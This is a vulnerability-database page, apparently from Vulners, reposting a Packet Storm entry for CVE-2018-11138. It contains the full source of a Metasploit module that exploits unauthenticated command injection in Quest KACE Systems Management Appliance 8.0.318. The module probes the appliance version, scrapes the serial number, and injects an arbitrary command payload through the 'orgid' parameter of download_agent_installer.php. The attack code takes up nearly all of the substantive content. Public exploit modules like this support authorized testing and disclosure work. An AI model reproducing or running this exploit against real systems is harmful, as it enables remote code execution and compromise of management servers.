Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Quest KACE Systems Management Command Injection

🗓️ 26 Jun 2018 00:00:00Reported by Brendan ColesType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 64 Views

Quest KACE Systems Management Command Injection exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318 and prior, allowing unauthenticated users to execute arbitrary commands as the web server user

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Quest KACE System Management Appliance 8.0 - Multiple Vulnerabilities
1 Jun 201800:00
zdt
0day.today		Quest KACE Systems Management - Command Injection Exploit
27 Jun 201800:00
zdt
ATTACKERKB		CVE-2018-11138
31 May 201800:00
attackerkb
Circl		CVE-2018-11138
26 Jun 201815:19
circl
CISA KEV Catalog		Quest KACE System Management Appliance Remote Command Execution Vulnerability
25 Mar 202200:00
cisa_kev
CNVD		Quest KACE System Management Appliance Command Injection Vulnerability (CNVD-2018-10907)
1 Jun 201800:00
cnvd
Core Security		Quest KACE System Management Appliance Multiple Vulnerabilities
31 May 201800:00
coresecurity
Check Point Advisories		Quest KACE System Management Appliance Unauthorized Access (CVE-2018-11138)
27 Aug 202000:00
checkpoint_advisories
CVE		CVE-2018-11138
31 May 201818:00
cve
Cvelist		CVE-2018-11138
31 May 201818:00
cvelist
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Quest KACE Systems Management Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in Quest KACE  
Systems Management Appliance version 8.0.318 (and possibly prior).  
  
The `download_agent_installer.php` file allows unauthenticated users  
to execute arbitrary commands as the web server user `www`.  
  
A valid Organization ID is required. The default value is `1`.  
  
A valid Windows agent version number must also be provided. If file  
sharing is enabled, the agent versions are available within the  
`\\kace.local\client\agent_provisioning\windows_platform` Samba share.  
Additionally, various agent versions are listed on the KACE website.  
  
This module has been tested successfully on Quest KACE Systems  
Management Appliance K1000 version 8.0 (Build 8.0.318).  
},  
'License' => MSF_LICENSE,  
'Privileged' => false,  
'Platform' => 'unix', # FreeBSD  
'Arch' => ARCH_CMD,  
'DisclosureDate' => 'May 31 2018',  
'Author' =>  
[  
'Leandro Barragan', # Discovery and PoC  
'Guido Leo', # Discovery and PoC  
'Brendan Coles', # Metasploit  
],  
'References' =>  
[  
['CVE', '2018-11138'],  
['URL', 'https://support.quest.com/product-notification/noti-00000134'],  
['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']  
],  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x27",  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl'  
}  
},  
'Targets' => [['Automatic', {}]],  
'DefaultTarget' => 0))  
register_options [  
OptString.new('SERIAL', [false, 'Serial number', '']),  
OptString.new('ORGANIZATION', [true, 'Organization ID', '1']),  
OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])  
]  
end  
  
def check  
res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))  
unless res  
vprint_error 'Connection failed'  
return CheckCode::Unknown  
end  
  
unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')  
vprint_status 'Remote host is not a Quest KACE appliance'  
return CheckCode::Safe  
end  
  
unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/  
vprint_error 'Could not determine KACE appliance version'  
return CheckCode::Detected  
end  
  
version = Gem::Version.new res.headers['X-KACE-Version'].to_s  
vprint_status "Found KACE appliance version #{version}"  
  
# Patched versions : https://support.quest.com/product-notification/noti-00000134  
if version < Gem::Version.new('7.0') ||  
(version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||  
(version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||  
(version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||  
(version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||  
(version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))  
return CheckCode::Appears  
end  
  
CheckCode::Safe  
end  
  
def serial_number  
return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''  
  
res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))  
return unless res  
  
res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first  
end  
  
def exploit  
check_code = check  
unless [CheckCode::Appears, CheckCode::Detected].include? check_code  
fail_with Failure::NotVulnerable, 'Target is not vulnerable'  
end  
  
serial = serial_number  
if serial.to_s.eql? ''  
print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'  
return  
end  
vprint_status "Using serial number: #{serial}"  
  
print_status "Sending payload (#{payload.encoded.length} bytes)"  
  
vars_get = Hash[{  
'platform' => 'windows',  
'serv' => Digest::SHA256.hexdigest(serial),  
'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",  
'version' => datastore['AGENT_VERSION']  
}.to_a.shuffle]  
  
res = send_request_cgi({  
'uri' => normalize_uri('common', 'download_agent_installer.php'),  
'vars_get' => vars_get  
}, 10)  
  
unless res  
fail_with Failure::Unreachable, 'Connection failed'  
end  
  
unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')  
fail_with Failure::UnexpectedReply, 'Unexpected reply'  
end  
  
case res.code  
when 200  
print_good 'Payload executed successfully'  
when 404  
fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'  
when 302  
if res.headers['location'].include? 'error.php'  
fail_with Failure::UnexpectedReply, 'Server encountered an error'  
end  
fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'  
else  
print_error 'Unexpected reply'  
end  
  
register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jun 2018 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.91931
quest kace systems managementcommand injectionvulnerabilityversion 8.0.318unauthenticated usersweb serverexploitcve-2018-11138
64